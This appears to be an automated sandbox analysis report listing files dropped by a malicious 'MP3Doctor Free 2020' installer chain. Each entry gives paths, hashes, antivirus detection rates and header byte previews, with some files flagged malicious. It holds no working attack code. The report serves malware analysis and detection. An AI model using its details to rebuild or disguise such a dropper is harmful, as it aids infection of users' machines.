SHA-512:	85D6E4CB89722E261782DC6638A50DC37283D60DFBF7DF6B37DCB412E2D0EB2D554D535E287BCD9161AFD9DA61240F8D3FDED142AE4D8703FA841DEB2D8DF086
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.................&...........2.......@....@..............................................@...............................%...`...>..........................................................................................................CODE.....$.......&.................. ..`DATA....<....@.....................@...BSS..........`.......<...................idata...%.......&...<..............@....tls.................b...................rdata...............b..............@..P.reloc..............................@..P.rsrc....>...`...>...d..............@..P.....................*..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-VCOE9.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	363880
Entropy (8bit):	6.3947346615222305
Encrypted:	false
SSDEEP:	6144:lieS4N0DdxBa72yNQuqped6c7Bv5ebr+U2pyQqsa3a8g+QTW:UeSyCVaiyNQAd6cV5K+Jp37W
MD5:	460B0576549FFD1F55D717BA6E265A05
SHA1:	65AB7E2109658102678C122D7DE603E64DCE7CC5
SHA-256:	AAB56C21B6CEC7065882A750BECB4526B4CB5815A4AC002C2594F84FB0F5955F
SHA-512:	666B16FF72CB847B8D141B0110BBB45AAE67D9BB01E2D6B48C7BDA61C5DC3126CCBC72627C1B93EC23B87E9427C39DC890F1E0A72E5077DC0071E5FEA1B1E3A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................7!.....;.....9...............>.;...Vh-.......>.......>.:....=...>.8...Rich....................PE..d.....%Y.........." .........d.......................................................L....`.........................................@........................P...7...l..h!......8.......................................p............ ...............................text...K........................... ..`.rdata....... ......................@..@.data...@....@.......(..............@....pdata...7...P...8...*..............@..@.rsrc................b..............@..@.reloc..8............h..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\libcurl.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	363880
Entropy (8bit):	6.3947346615222305
Encrypted:	false
SSDEEP:	6144:lieS4N0DdxBa72yNQuqped6c7Bv5ebr+U2pyQqsa3a8g+QTW:UeSyCVaiyNQAd6cV5K+Jp37W
MD5:	460B0576549FFD1F55D717BA6E265A05
SHA1:	65AB7E2109658102678C122D7DE603E64DCE7CC5
SHA-256:	AAB56C21B6CEC7065882A750BECB4526B4CB5815A4AC002C2594F84FB0F5955F
SHA-512:	666B16FF72CB847B8D141B0110BBB45AAE67D9BB01E2D6B48C7BDA61C5DC3126CCBC72627C1B93EC23B87E9427C39DC890F1E0A72E5077DC0071E5FEA1B1E3A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................7!.....;.....9...............>.;...Vh-.......>.......>.:....=...>.8...Rich....................PE..d.....%Y.........." .........d.......................................................L....`.........................................@........................P...7...l..h!......8.......................................p............ ...............................text...K........................... ..`.rdata....... ......................@..@.data...@....@.......(..............@....pdata...7...P...8...*..............@..@.rsrc................b..............@..@.reloc..8............h..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\libeay32.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2042352
Entropy (8bit):	7.085275197144553
Encrypted:	false
SSDEEP:	24576:OFZD9URlmDrgBrhEci8XhP3YLd44RS6+FNbqUzUxVvqKGTZnIzudBDFPjQAr10Fu:+ZeLrXFcL0YF7pvtHkfH
MD5:	876A839023B8F962A72D295DA7495734
SHA1:	62A7728679BC18784B1FBF1D013F7CECE18CBEC9
SHA-256:	A757D773DA406411FB977761F6E56F016D48D224AEDAF3D875ED4D4A9EDE6158
SHA-512:	E1B23A2F5EC0100FF874CA075BBD0F90E9065A90FEC66861F99DF603D7AAA9DB8E8EC326710FDC11AD41D01BEFE4EA3077136127ACF613614D0D12FF23BEC6C1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....^............................4.............@..........................@.......................................................p...3..............X............................................................................................text............................... ..`.rdata..x%.......0..................@..@.data....S.......0..................@....rsrc....@...p...@...@..............@..@.vcp1208............................a.G.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\libmp3lame.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	397672
Entropy (8bit):	6.4894894939696846
Encrypted:	false
SSDEEP:	12288:W8c9NNNNNNBgjcQFg7jaV95D3+wxech2KJ:tc9NNNNNN+jcQg7jMnD/xech2o
MD5:	B9F3C911728B17FE49BB217D799FCC1A
SHA1:	26F4A963E2F43F46323D8610FEC5E8CC8C4A8A16
SHA-256:	9CEB41F04B48CF7B419C95D03E227F593836D74A04625C0AD5AD2877D7229B65
SHA-512:	0A50270432E6E476D5B4DAF7D9D45053F821BEF02F1872EF598A9E66B2E6B75AE4A89AB97AE175C5143CE3C993D7A354F6389EB5A8BDDBFDE59522103535C403
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.{.%.{.%.{.%.=%.{.%.?%.{.%..%.{.%..%.{.%...%.{.%`.+%.{.%.{.%.{.%..<%.{.%.);%.{.%.{w%.{.%..>%.{.%Rich.{.%........................PE..d......].........." .....8..........................................................g,....`.........................................@...87..x...<.... ...........%......h!...........................................k..p............P...............................text...;6.......8.................. ..`.rdata.......P.......<..............@..@.data...............................@....pdata...%.......&..................@..@_RDATA..P/.......0..................@..@.rsrc........ ......................@..@.reloc..............................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\mousehelper.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20840
Entropy (8bit):	6.3244920295043645
Encrypted:	false
SSDEEP:	384:rk3cFbdBtZHvagGFsGfZyGmGovy8ZpHEi+:rk0vHy9oyiRM
MD5:	D2BC90D6AF120A0643AD5DC5F3CE8D43
SHA1:	419C3246B08125754CCBB4323DD823F8DA0548CB
SHA-256:	BDED78571A2E60B3324AB9B4D3DDB6DE12FC08CB4BBE6A582A2C2292AA17CCE6
SHA-512:	F34C90E44F473A8CD62B75B6D531FDD47AD132A3F1BCE7AD5C0DDF30C61A2454BA214AA2B6CD50C2A1B6CD3AC85F2D9989775376A400D34EBBD2EFAB0FBECC7A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ovA{+./(+./(+./("o.(/./(yb.))./(yb)%./(yb+)#./(yb,)(./(?\|.)../(+..(../(.b)./(.b/)./(.b.(./(.b-)./(Rich+./(........................PE..d....z{c.........." ......... .......................................................7....`..........................................8..t...T;..x....p.......`.......0..h!......<....1...............................2..8............0..(............................text............................... ..`.rdata.......0......................@..@.data........P.......(..............@....pdata.......`.......*..............@..@.rsrc........p.......,..............@..@.reloc..<...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	3942200
Entropy (8bit):	6.454608555117161
Encrypted:	false
SSDEEP:	49152:iX1kN5mAv+7kHU4A7g9nsHccuooirQCdt35BpZEac2HqGM:TNY2+7OU4i4sHzuooaQCdb/c2HqGM
MD5:	0918C3DC6A1E6CCE306FA4FF996E66BB
SHA1:	ABB776446C0697A8AE8C790A0C838EA5D1FBF406
SHA-256:	6ED20F480C9170A3E77E0C8E1AC4A0EEA697BE7E9D9199C19DBDE47CCADA3ED3
SHA-512:	E9F8E550E91E4B4D09CB63C0C6BD263D89C461687A32E6D68642441818C65F216CD79FC117CB6E92252567FB0A4C09142AC95F828DA1BFC860DD65DE02B7017D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..........'..........0....................@..........................`<......................................................................................................................................................................text............................... ..`.hhead9.F$.......0..................@..@.data....S... ...0... ..............@....rsrc................P..............@..@.ihead9..@... ..87..................a.\|.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcp120.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	660128
Entropy (8bit):	6.339798513733826
Encrypted:	false
SSDEEP:	12288:N2fus43uu43Ry4GHlT4xH2K+M+/i+WSpY+7YOzCaK9A3gS2EKZm+GWodEEwnyh:muJzCaK9AB2EKZm+GWodEEwnyh
MD5:	46060C35F697281BC5E7337AEE3722B1
SHA1:	D0164C041707F297A73ABB9EA854111953E99CF1
SHA-256:	2ABF0AAB5A3C5AE9424B64E9D19D9D6D4AEBC67814D7E92E4927B9798FEF2848
SHA-512:	2CF2ED4D45C79A6E6CEBFA3D332710A97F5CF0251DC194EEC8C54EA0CB85762FD19822610021CCD6A6904E80AFAE1590A83AF1FA45152F28CA56D862A3473F0A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;..h..h..h..[h..h..h..h..Mh..hIAWh..h..Oh..h..qh..h..ph..h..uh..h..Lh..h..Kh..h..Nh..hRich..h................PE..d.....OR.........." .....@...................................................`......a.....`.........................................pU.. ....2..<....@...........G.......>...P.......X..................................p............P...............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data........P...8...B..............@....pdata...G.......H...z..............@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcp140.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	590632
Entropy (8bit):	6.463330275333709
Encrypted:	false
SSDEEP:	12288:Mt8MRN4gE4x4iTqwTQa6IUqXF7XyxpypsdUDqNSfbQEKZm+jWodEEV3Ho/:MCMm9pyp35bQEKZm+jWodEExg
MD5:	E74CAF5D94AA08D046A44ED6ED84A3C5
SHA1:	ED9F696FA0902A7C16B257DA9B22FB605B72B12E
SHA-256:	3DEDEF76C87DB736C005D06A8E0D084204B836AF361A6BD2EE4651D9C45675E8
SHA-512:	D3128587BC8D62E4D53F8B5F95EB687BC117A6D5678C08DC6B59B72EA9178A7FD6AE8FAA9094D21977C406739D6C38A440134C1C1F6F9A44809E80D162723254
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n..............w.(...#...<........../.....".................+.....g.+.....+...Rich*...................PE..d...R8.^.........." .....>..........p"....................................................`A........................................ m..h....G..,...............(;......(A......4.......T...............................0............P......Ti..@....................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data....:...`..."...P..............@....pdata..(;.......<...r..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcp140_1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31528
Entropy (8bit):	6.472533190412445
Encrypted:	false
SSDEEP:	384:R77JqjlI8icUYWhN5tWcS5gWZoMUekWi9pBj0HRN7RA5aWixHRN7osDhzlGs6N+E:R5D8icUlX5YYMLAWRAlypmPB
MD5:	7EE2B93A97485E6222C393BFA653926B
SHA1:	F4779CBFF235D21C386DA7276021F136CA233320
SHA-256:	BD57D8EEF0BC3A757C5CE5F486A547C79E12482AC8E694C47A6AB794AA745F1F
SHA-512:	4A4A3F56674B54683C88BD696AB5D02750E9A61F3089274FAA25E16A858805958E8BE1C391A257E73D889B1EEA30C173D0296509221D68A492A488D725C2B101
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..\4~.\4~.\4~...^4~.UL..X4~.Dz.[4~.D}.^4~.\4..v4~.D..Y4~.D{.O4~.D~.]4~.D..]4~.D\|.]4~.Rich\4~.........PE..d...W8.^.........." .........$............................................................`A.........................................>..L....?..x....p.......`..4....:..(A......p...@3..T............................3..0............0..0............................text...(........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata..4....`.......0..............@..@.rsrc........p.......4..............@..@.reloc..p............8..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcr120.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	963232
Entropy (8bit):	6.634408584960502
Encrypted:	false
SSDEEP:	24576:FkZ+EUPoH5KTcAxt/qvRQdxQxO61kCS9mmWymzVPD:FkMAlM8ixQI5C6wl
MD5:	9C861C079DD81762B6C54E37597B7712
SHA1:	62CB65A1D79E2C5ADA0C7BFC04C18693567C90D0
SHA-256:	AD32240BB1DE55C3F5FCAC8789F583A17057F9D14914C538C2A7A5AD346B341C
SHA-512:	3AA770D6FBA8590FDCF5D263CB2B3D2FAE859E29D31AD482FBFBD700BCD602A013AC2568475999EF9FB06AE666D203D97F42181EC7344CBA023A8534FB13ACB7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ck.."..".."..D...".."..-"...s..$ ...s.."...s.."...s.. "...s.."...s.."...s.."..Rich."..........................PE..d.....OR.........." .....h...:.......)..............................................].....`.................................................@...(............@...s...t...>......8...p................................2..p............................................text....g.......h.................. ..`.rdata...8.......:...l..............@..@.data...hu.......D..................@....pdata...s...@...t..................@..@.rsrc................^..............@..@.reloc..8............b..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\openh264.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	869224
Entropy (8bit):	6.632387605957213
Encrypted:	false
SSDEEP:	24576:DJf34ppw4hjg401r+iTy2mmzuF3SJciti0ZIj8UoJwCR:Dl3ypw4yN/RiF3SJdO8xJv
MD5:	DAA904CE63B0A290111AED5E843B9368
SHA1:	6642AD5C2622D756EB3500E7C0420E9DA7A16BB1
SHA-256:	471BBC3FA0A98869F6791E0D1A55B38F5E360842A7CC219A6FF26030E62DBB1B
SHA-512:	CBFD06523F1855AAF4BE2D33EB3A3A324C8D7AF4871B314AC2C165FD17F8DA6CD2F465E9405412282AAC1ED247B811A4A73D91069A324A5AEC531253AE3A4D0B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.9d0.W70.W70.W7...73.W70.V7m.W7.M.71.W7v..7..W7v..7..W7v..7$.W7.s.7e.W70.W7'.W7.s.71.W7=..71.W7.s.71.W7Rich0.W7........PE..d......].........." .....8...........\...............................................$....`.................................................\|...(....`..........x]..."..h!...p.......R..8...............................p............P..H............................text...7+.......,.................. ..`.rodata......@.......0.............. ..`.rdata..FP...P...R...<..............@..@.data... K.......&..................@....pdata..x].......^..................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\openh264_license.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	ASCII text
Category:	dropped
Size (bytes):	1297
Entropy (8bit):	5.115489615345492
Encrypted:	false
SSDEEP:	24:CbUneZXof9+bOOrXqFT09+JYrXqFTzl796432s4EOkUs8QROJ32s3yxsITf+3t1e:Cn3OOrXqJ07rXqJzr6432sv832s3EsI/
MD5:	AAF4009F5963B1B270D8C3E697EBE442
SHA1:	F5A44235094DA0B8B5992C6112CB8C356EF22B93
SHA-256:	3988CDCCB878675B4AB8C11F21EF7F6301451F59E2E2BF3F07E963D36C8E9767
SHA-512:	BC30F4C5F17E4F0CDE2CDD5C36A6EC28271569E18808E736186D42409564E3E6FFA8AD23842912C90F39CE6264A698714A434092778C74CBDE6C330DD3969109
Malicious:	false
Preview:	Copyright (c) 2013, Cisco Systems.All rights reserved...Redistribution and use in source and binary forms, with or without modification,.are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...* Redistributions in binary form must reproduce the above copyright notice, this. list of conditions and the following disclaimer in the documentation and/or. other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR.ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES.(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERV

C:\Users\user\AppData\Local\MP3Doctor Free 2020\proportions.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	51
Entropy (8bit):	3.48286657951254
Encrypted:	false
SSDEEP:	3:cUoytoUD6MBomFUT:cUoQoUD6Qoyy
MD5:	034D89CD2C41EDFCEADA9F96A3C0A56A
SHA1:	92AB4E6FF98CA987D56EA3C1BA36D1C61EF23ACB
SHA-256:	44BBE94D481B106F00223DD406D015AEFD00CFA2DBA9428BEFC2B8F6A3FEB971
SHA-512:	6C3E701D2D0FD24FDB46C0E1B0EF5245F36E4A34A9D2340665A31F6331C2D6F08680399600FB02C3D51694F9BAFFB3E41A367CB4FE945D4836B669DA63EB6358
Malicious:	false
Preview:	1 1..4 3..3 2..16 9..6 5..468 60..728 90..2592 1936

C:\Users\user\AppData\Local\MP3Doctor Free 2020\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	InnoSetup Log MP3Doctor Free 2020, version 0x30, 5360 bytes, 651689\user, "C:\Users\user\AppData\Local\MP3Doctor Free 2020"
Category:	dropped
Size (bytes):	5360
Entropy (8bit):	4.807590073434228
Encrypted:	false
SSDEEP:	96:PSJpWc688dpEGbtxn9ts+eOIh704cVSQs0LqOp+vPOeD/37c:PQpWc686pRbHJHIhFcVSQ1qOp+vPOeDo
MD5:	6EFEFC96F610052774EEA72B426DD8C4
SHA1:	E7C29D79DF4E6357719AE6527C9D5D080901A29B
SHA-256:	258B38B71A7B11984E4E20A1EC227683A25E04EB74BD4C0BB94AD2DC9634CE72
SHA-512:	2D7BC397BDA355E936403AB2DCE93E721390EAEED57A3AF3376DCA4154E972CDAE2C22A070FED816C5F6F21C45538C1EF309A1BA6F17D8E2D9DE2BA6DC290F52
Malicious:	false
Preview:	Inno Setup Uninstall Log (b)....................................MP3Doctor Free 2020.............................................................................................................MP3Doctor Free 2020.............................................................................................................0...........%.................................................................................................................A.........}r........V....651689.user3C:\Users\user\AppData\Local\MP3Doctor Free 2020.................. .....9......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:

C:\Users\user\AppData\Local\MP3Doctor Free 2020\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	707354
Entropy (8bit):	6.472733501771484
Encrypted:	false
SSDEEP:	12288:C0QfKb7nH5lrPo37AzHTA63I0ihE4aEJOrNv4gM/RelAseY/XExy8J:yfKbT5lrPo37AzHTA63/cfa74F0lAi/q
MD5:	D790DAB935B81DC923E76A50FF0A20EF
SHA1:	FE08768E29D86C392F80EEFCC38E23971844A61E
SHA-256:	6587B61223FF1C184C0A5B153846B0229771AEE05F7AA74A82CBB4099A48A596
SHA-512:	85D6E4CB89722E261782DC6638A50DC37283D60DFBF7DF6B37DCB412E2D0EB2D554D535E287BCD9161AFD9DA61240F8D3FDED142AE4D8703FA841DEB2D8DF086
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.................&...........2.......@....@..............................................@...............................%...`...>..........................................................................................................CODE.....$.......&.................. ..`DATA....<....@.....................@...BSS..........`.......<...................idata...%.......&...<..............@....tls.................b...................rdata...............b..............@..P.reloc..............................@..P.rsrc....>...`...>...d..............@..P.....................*..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4MZEKMRe7m6bc8qivCccLsq8.exe.log

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
MD5:	93E4C46884CB6EE7CDCC4AACE78CDFAC
SHA1:	29B12D9409BA9AFE4C949F02F7D232233C0B5228
SHA-256:	2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
SHA-512:	E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	2A56468A7C0F324A42EA599BF0511FAF
SHA1:	404B343A86EDEDF5B908D7359EB8AA957D1D4333
SHA-256:	6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
SHA-512:	19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yHP2Z5SFUIZjI8pAKB_H3QUP.exe.log

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	730
Entropy (8bit):	5.3458694453090025
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9fDLI4MNZcgB2MOqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qrE4/A1E4KlKDE4KhKiKhk
MD5:	8DF93B6D82E7E7831679EC413BE8E6CA
SHA1:	307D59A9CA99E97E44631997464F841734B70D5B
